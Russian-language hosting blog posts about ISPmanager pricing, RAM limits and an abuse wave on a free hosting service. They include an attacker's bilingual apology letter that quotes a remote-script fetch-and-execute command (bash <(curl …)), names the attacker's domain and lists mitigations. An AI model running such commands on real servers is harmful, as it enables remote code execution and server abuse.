ISPmanager стала стоить как сервер или как ВДС

раньше как было?
5 баксов вдс-ка
150р вроде панель или 200р панель
вечная стоила 1600р — примерно как 3 месяца или в каких-то годах как пол года стоимости сервера

сейчас можно за 20 евро 30 евро 40 евро купить дедик
от 10 до 30 — самые бомж линейки

ВДС-ка как мы считали ранее многократно
как раз хостеры, в том числе и я — пытаемся создать тарифы не дороже 2000р за 8 озу 4000р за 8 озу уже считается неприличным
ведь за 4000р можно купить уже бомж дедик аля 40 евро

конечно с учетом курса и всех цепочек перепродажников поборщиков налогов банковских комиссий 40 евро превращаются в 7200р и продаются за 7200р, а не за 4000р

но все равно панель стала стоить 2000р
hosting.kitchen/ispmanager-com/obnovlenie-cen-v-ispmanager-s-1-fevralya.html
Image
а это считай что столько же — сколько стоит и сама ВДС-ка на 8 озу

раньше я пользовался исключительно вечными
по первости ради цены и экономии, когда ты новичок ты хочешь все подешевле, в 2011 году я отдал 20000р за статус партнера и получил скидку, которую потом всем раздавал, не зря же я отдал 20000р, мне было жалко отдать эти бабки просто так, хоть мне и не требовались эти панели вовсе ) поэтому чтобы 20к пропали не за зря я начал помогать людям сэкономить. я купил статус партнера из-за логотипа своего первого сайта в их списке партнеров, который они потом в будущем удалят весь список, а потом через годы снова вернут, но люди уже запомнят их отношение и повторно вписываться не будут, а просто пошлют нахуй

потом скорее ради удобства — потому что дедики работают на одной ОС по 10 лет пока не сгорят (у меня до сих пор работает дебиан 7 например кое где все еще)
поэтому менять панель скорее было просто лень
а они своими обновлениями заставляли людей «обновляться»
дело было даже не в деньгах, а просто в самом факте — человек не хотел менять сервер
поэтому за прошедшие 15 лет было много срачей на эту тему
вот с приходом 6-ой версии — вроде бы наладилась стабильность, больше не требуется постоянных этих передергиваний из 4-ой на 5-ую из 5-ой на 6-ую
если бы сейчас ISPsystem управляли прошлые владельцы — они бы уже 7-ую выпустили, как раз срок в 5 лет прошел (2020 была 6-ая запущена)
но новые владельцы умеют работать — и поэтому продолжают просто брать бабки и не трогать «то что уже работает».

что же делают старые владельцы?
видимо 7-ую версию они тоже наконец-то прозрели — и не захотели делать
но зато они решили поднять цены

отчасти лишние 400р (1600-2000) роли никакой не сыграют
но для личного сервера покупать панель за 2000р (12*2000=24000, 10 лет 240000р что равно просто себестоимости полной покупки на коло на те же 10 лет)
хуй знает
хуй знает
дело не в том, сколько ты отдашь, а в психологии что ты не видишь ценности от продукта и считаешь эти расходы просто выбросом денег, а вместо выброса ты мог бы купить «дедик на коло». а мне действительно от ПО ничего не нужно, я не пользуюсь ни питонами ни джава скриптами, ни файловым менеджером, ни прочей поебенью, я пользуюсь только добавить www-домен и закачать сайт по ftp и забыть о нем на 15 лет.
у меня например сервер который 15 лет должен работать, но там 100 сайтов всяких с 1 html или заглушкой даже — я не могу купить дешевую версию панели, мне нужно покупать именно безлимитные версии
плюс так как у меня множество сущностей, то и серверов тоже много, я же дроблю для надежности по разным geo, а значит и панелей требуется достаточно.
на одни только RDP я отдаю 50к, а еще 55к уходит на «серверы для блогов» чтобы в случае аварий хоть какие-то блоги то работали. а не упали все разом. в эту сумму входят и дубликаты и бекап серверы и почтовые всякие и суммы лицензий панелей, а так же даже запасные пустые на будущее. да, на коло я мог бы сделать все дешевле, но я не доверяю собственным хостингам так же, как доверяю ОВХ и его стабильности. именно поэтому ОВХ я тоже покупаю что-то бомжовое, если бы я покупал от ОВХ топ серверы я бы сотни тысяч тратил. а приходится вот бомжевать по распродажам из-за кол-ва сущностей. и не забываем что у меня еще все домены сжирают 1 месяц из 12 месяцев моей прибыли.
Image

когда убили вечные
народ уже начал переходить на бесплатные аналоги
а когда ISPsystem меня забанили за честный комментарий на своем блоге
я еще эти бесплатные аналоги активно так раструбил по всему интернету, во всех проектах сообществах биллингах делал рассылки, создавал специальные описания в тарифах ISPsystem с ссылкой на бесплатные аналоги, в своих блогах новости бесплатных панелей публиковал постоянно.
я даже бан на LET получил, когда создал топик про fastpanel в том году, когда она вышла, из-за панели потерял такое сообщество LET
в конечном счете они добились признания
hosting.kitchen/hostkey-com/hosting-paneli-s-otkrytym-i-zakrytym-kodom-kakie-resheniya-vybirayut-klienty.html
Image

НО ispmanager все еще покупают по нескольким причинам
1. она работает автоматически с billmanager если ты создаешь сервер для проекта — под боевой сервер по сути и 10000р мес не жалко будет отдать, он же окупится через клиентов.
1.1. но вот для личного сервера с 100 бесполезных сайтов отдавать за 10 лет стоимость самого сервера или двойную стоимость сервера бомжа через аренду — это ХЗ ХЗ

2. ISPmanager умеет все таки делать автоматическую копию сервера на другой сервер. они отработали хорошо импорт. одной кнопкой восстанавливаешься или делаешь раз в неделю дубликат всего сервера «как запасной план Б»
2.1 умеет ли fastpanel так же мигрировать? хуй знает, я не проверял, но возможно в 2026 стоит проверить как раз, может быть для личных сайтов мне уже больше никогда и не потребуется ISPmanager

3. раньше еще после 2018 года, когда вечные закрылись и когда казалось бы ISPmanager больше никому не нужна. все равно ее покупали почему? из-за автоматических бесплатных LetSSL
3.1 потом уже и fastpanel научилась так же делать, поэтому эта причина отпадает. допустим если я хочу себе микро сервер для почты или для бекапа, я 100% поставлю fastpanel. или даже если для заглушек каких-то, но не в огромном кол-ве, при большом кол-ве интерфейс ispmanager удобнее поиск сайтов. Но вот если я ставлю рабочий боевой продукт, fastpanel пока что еще не добилась в моих глазах такой же стабильной репутации как ispmanager. причина как я уже описал в отказоустойчивости, в авто копировании всех данных по разным серверам через средства панели.

  1. ну короче 2000р за месяц
  2. при цене 2000р за ВДС на 8 озу
  3. или при цене 30 евро за дедик на 32/64 озу
  4. при сроке пользования на 10-15 лет «пока не сгорит»

заставляет меня задуматься о том, на какой панели я буду ставить НОВЫЕ серверы с 2026 года
скорее всего не только меня это заставит задуматься
раз я вообще пишу этот топик — значит «массовый потребитель вроде меня» — задумался, иначе бы я просто сказал да и похуй на повышение и даже бы не обратил на это внимание.

с одной стороны тарификация по кол-ву сайтов правильная
но с другой стороны они не учитывают что кто-то имеет 400 доменов где только 50 нормальные, а остальные или «на будущее» или «пустые заглушки»
а за заглушки платить лишние бабки уже не хочется

Питон не удаляется, однажды установил - навсегда страдай

начало
hosting.show/alice2k-hosting/dlya-kitaycev-nuzhno-sobirat-1-tb-ozu-servery-pohozhe-no-k-sozhaleniyu-takih-staryh-i-nenuzhnyh-poka-esche-net-no-v-2030-budut.html

Image
Сайтов на питоне нет — я все удалил
Нет не одного питон процесса в списке процессов
Но увы — не удаляется.

Image
Image

Image
Image

Короче 1 процесс жрет 60 мб
1 ТБ озу сервер это 1000000 мб
/ 16000 процессов
допустим по 5 процессов на человека
16000/5 = 3200 аккаунтов

И это кстати хороший пример того что означает «слабый хостинг».
Вот я писал много раз про слабые облака или что-ниб еще.
Пришел наплыв заказов — продукт не справился. Так как там было 32 озу 128 озу и 16 озу и 16 озу всего лишь 4 сервера бомжа, для бесплатного то хостинга.
Но любой нормальный хостинг, например таймвеб или регру которые считают себя лидерами должен в запасе иметь думаю около 10 ТБ озу чтобы в случае чего не опозориться.
Тоже самое с ВДС я писал уже ранее

Я конечно своим проебом это не считаю — так как услугу бесплатного хостинга я и не планировал масштабировать. Но если бы я серьезно задумался сделать «хостинг сайтов» то только 10 ТБ озу запаса — только так.

нашел еще в тикетах, оказывается еще вчера написал челик который и распространил

начало интересного случая с дырявой ISPmanager
hosting.show/alice2k-hosting/dlya-kitaycev-nuzhno-sobirat-1-tb-ozu-servery-pohozhe-no-k-sozhaleniyu-takih-staryh-i-nenuzhnyh-poka-esche-net-no-v-2030-budut.html

I am writing to take full responsibility for the recent wave of service abuse that has impacted your platform. I am the person who initiated this situation.

Initially, I discovered a method that allowed for arbitrary command execution using Python on your servers. Without considering the potential consequences, I shared this finding within an online community. I severely underestimated the impact this would have, and I never intended for it to lead to widespread malicious activity.

To mitigate any further damage, I have now deleted all the content I posted regarding this method. I want to express my deepest and most sincere apologies for the significant disruption and trouble this has caused.

In an effort to help you secure your platform and make amends, I am providing a detailed analysis of the exploit and a set of actionable recommendations to block this and similar attacks in the future.

Technical Analysis and Recommendations

The attack relies on the ability to download and execute a remote shell script from within a user’s process. The core command being used is: bash <(curl -Ls [REMOTE_SCRIPT_URL]).

Here are several layered defense strategies to prevent this:

Immediate Mitigation: Network Egress Filtering

This is the fastest way to stop the current attack.

Action:
Block Specific Domain: Use your firewall to block all outbound traffic to the domain main.ssss.nyc.mn.
Default Deny Policy (Best Practice): Block all outbound internet access by default and only whitelist essential domains. This prevents attackers from simply moving their script to a new domain.

Core Solution: Restrict the Execution Environment

This is the fundamental, long-term solution.

Action:
Disable Dangerous Functions: In your Python environment, disable dangerous modules like subprocess, os.system, os.popen, etc.
Use Secure Sandboxing: Run user code within a heavily restricted sandbox (e.g., Docker with strict seccomp and AppArmor/SELinux profiles, or technologies like gVisor). The process should run as a low-privilege, non-root user.

Detection and Monitoring

This allows you to detect and respond to threats in real-time.

Action:
Monitor Process Creation: Log and alert whenever a user’s process spawns a shell or network utility (e.g., /bin/bash, curl, wget).
Monitor Network Connections: Log all outbound connections and alert on traffic to suspicious or unknown destinations.

Summary of Recommendations

Strategy: 1. Network Filtering
Implementation Method: Firewall rules to block specific outbound domains/IPs.
Impact: Immediate. Stops the current attack vector.

Strategy: 2. Environment Hardening
Implementation Method: Disable dangerous functions, use sandboxing (Docker, gVisor).
Impact: Strategic. The most robust long-term solution.

Strategy: 3. Detection & Monitoring
Implementation Method: Log and alert on suspicious process/network activity.
Impact: Proactive. Provides visibility for rapid response.

I once again apologize for my irresponsible actions. I hope this technical information is useful for your team and helps you strengthen your platform’s security.

Sincerely,

Я пишу, чтобы взять на себя полную ответственность за недавнюю волну злоупотреблений сервисами, которая затронула вашу платформу. Я являюсь лицом, инициировавшим эту ситуацию.

Изначально я обнаружил метод, позволяющий выполнять произвольные команды с использованием Python на ваших серверах. Не оценивая возможные последствия, я поделился этим открытием в онлайн-сообществе. Я сильно недооценил последствия этого и никогда не подразумевал, что это приведет к широкому распространению вредоносной активности.

Чтобы минимизировать дальнейший ущерб, я удалил весь опубликованный мной контент, касающийся этого метода. Хочу принести свои глубочайшие и самые искренние извинения за значительные сбои и проблемы, которые это вызвало.

Чтобы помочь вам защитить вашу платформу и исправить ситуацию, я предоставляю подробный анализ эксплойта и набор практических рекомендаций по блокированию этой и подобных атак в будущем.

Технический анализ и рекомендации

Атака основана на возможности загрузки и выполнения удаленного скрипта оболочки из процесса пользователя. Основная используемая команда: bash <(curl -Ls [URL_УДАЛЁННОГО_СКРИПТ]).

Вот несколько многоуровневых стратегий защиты для предотвращения этого:

Немедленное смягчение: Фильтрация исходящего сетевого трафика

Это самый быстрый способ остановить текущую атаку.

Действие:
Блокировка определённого домена: Используйте брандмауэр для блокировки всего исходящего трафика в домен main.ssss.nyc.mn.
Политика запрета по умолчанию (рекомендуемая практика): Блокируйте весь исходящий интернет-доступ по умолчанию и добавляйте в белый список только необходимые домены. Это не позволит злоумышленникам просто перенести свой скрипт в новый домен.

Основное решение: Ограничьте среду выполнения

Это фундаментальное долгосрочное решение.

Действие:
Отключите опасные функции: В вашей среде Python отключите опасные модули, такие как subprocess, os.system, os.popen и т. д.
Используйте безопасную песочницу: запускайте пользовательский код в строго ограниченной песочнице (например, Docker со строгими профилями seccomp и AppArmor/SELinux, или такими технологиями, как gVisor). Процесс должен запускаться от имени пользователя с низкими привилегиями, не являющегося пользователем root.

Обнаружение и мониторинг

Это позволяет обнаруживать угрозы и реагировать на них в режиме реального времени.

Действие:
Мониторинг создания процессов: регистрируйте и оповещайте о каждом запуске пользовательским процессом оболочки или сетевой утилиты (например, /bin/bash, curl, wget).

Мониторинг сетевых подключений: регистрируйте все исходящие соединения и оповещайте о трафике, направленном на подозрительные или неизвестные адреса.

Резюме рекомендаций

Стратегия: 1. Фильтрация сети
Метод реализации: правила брандмауэра для блокировки определенных исходящих доменов/IP-адресов.
Воздействие: немедленное. Блокирует текущий вектор атаки.

Стратегия: 2. Укрепление среды
Метод реализации: Отключение опасных функций, использование изолированной среды (Docker, gVisor).
Воздействие: Стратегическое. Наиболее надёжное долгосрочное решение.

Стратегия: 3. Обнаружение и мониторинг
Метод реализации: Регистрация и оповещение о подозрительной активности процесса/сети.
Воздействие: Проактивное. Обеспечивает прозрачность для быстрого реагирования.

Ещё раз прошу прощения за свои безответственные действия. Надеюсь, эта техническая информация будет полезна вашей команде и поможет вам укрепить безопасность вашей платформы.

С уважением,

для китайцев нужно собирать 1 ТБ озу серверы похоже - но к сожалению таких старых и ненужных ПОКА ЕЩЕ НЕТ, но в 2030 будут

короче кто-то прорекламировал в китай-нете мой бесплатный хостинг очередную попытку, прошлые бесплатные я закрывал из-за никому ненужности много раз на протяжении 15 лет
который не пользовался спросом и 10 человек может быть отсилы им пользовались

и случился наплыв регистраций
ранее уже было что-то такое, под XRAY VPN
но там было человек 20-30 с китая не более

в тот раз я пытался залимитировать какой-то Xray но не удалось
пришлось просто из тех 30 человек забанить половину и все

в этот раз зарегистрировалось аж почти 2000 человек
Image
Image

Image
Image

собственно ISPmanager не смогла даже создать 500 аккаунтов и уже зависла сразу померла
но в этот раз китайцы устанавливали Питон приложения или Node-JS приложения
hosting.show/alice2k-hosting/u-ispmanager-snova-utechki-bagov---limity-v-paneli-ne-rabotayut.html

сначала я подумал что это клоны и боты
но нет, это все реальные люди
и даже часть из них потом после регистрации когда поняла что «нихуя бесплатный хостинг не выдается»
просто хотела удалить свой аккаунт
23 человека хотели удалиться
Image

в данном случае мой бесплатный хостинг с 32 озу серверами бомжами от ОВХ по 10 евро или 128 озу даже ненужным на коло в москве — не справился с задачей
я бы раздал каждому китайцу по 100 мегабайт на 1 аккаунт ISPmanager — мне не жалко
но как мы поняли — ISPmanager не умеет лимитировать ОЗУ

поэтому теперь останется ждать когда старые серверы на 768 озу или даже 1 ТБ — станут морально старые и гнилые
и потом когда-ниб
мы еще вернемся к бесплатному хостингу для китайцев

если бы биллинг умел в аналитику
Image
я бы узнал откуда они пришли
но к сожалению понятия не имею где кинули ссылку на мой проект

У ISPmanager снова утечки багов - лимиты в панели не работают

В прошлый раз абузили Xray
hosting.show/alice2k-hosting/ispmanager-ne-rabotayut-limity.html

Теперь еще какую-то Node-js парашу
Image

Т.к. в супер крутой ПЛАТНОЙ СУКА панели ОТСУТСВУЮТ ЛИМИТЫ НА ЭТИ НОВОМОДНЫЕ ХУЙНИ

пришлось их нахуй отключить
hosting.kitchen/yacolo-com/udalyaem-nenuzhnye-funkcii-kotorye-ispolzuyutsya-tolko-dlya-zloupotrebleniya-chtoby-polozhit-ves-server-cherez-utechku-ozu-v-sovremennoy-ispmanager-6.html

  1. ISPmanager 4 pro — была самая охуенная там были четкие функции и четкие настройки
  2. ISPmanager 5 lite — была охуенная не было никаких лимитов, но и не было говно функций лишних
  3. ISPmanager 6 host (бывшая max lite которую зачем-то превратили в host) — зачем-то добавила в панель для сайтов какой-то VPN, зачем-то сделала там функукции которые обычно на VDS работают — и стала говно панелью

почему в энтерпрайзах всегда такие тупые предложения сотрудничества ?

как делает нормальный человек
гуглит всю историю
знает 80% всего о человеке и его проектах и его команде
и только потом пишет «привет чувак я знаю что ты такой и такой, но вот я погуглил и понял что вот этому и этому и этому проекту твоему не хватает вот таких таких и таких вещей, которые как раз я могу тебе дать через партнерство».

но только в энтерпрайзах дауны хотят поговорить по телефону
или может быть это просто мошенники вообще?
Image

скорее всего это мошеннический сайт
Image

кто-то просто пытается разводить клиентов под видом ISPmanager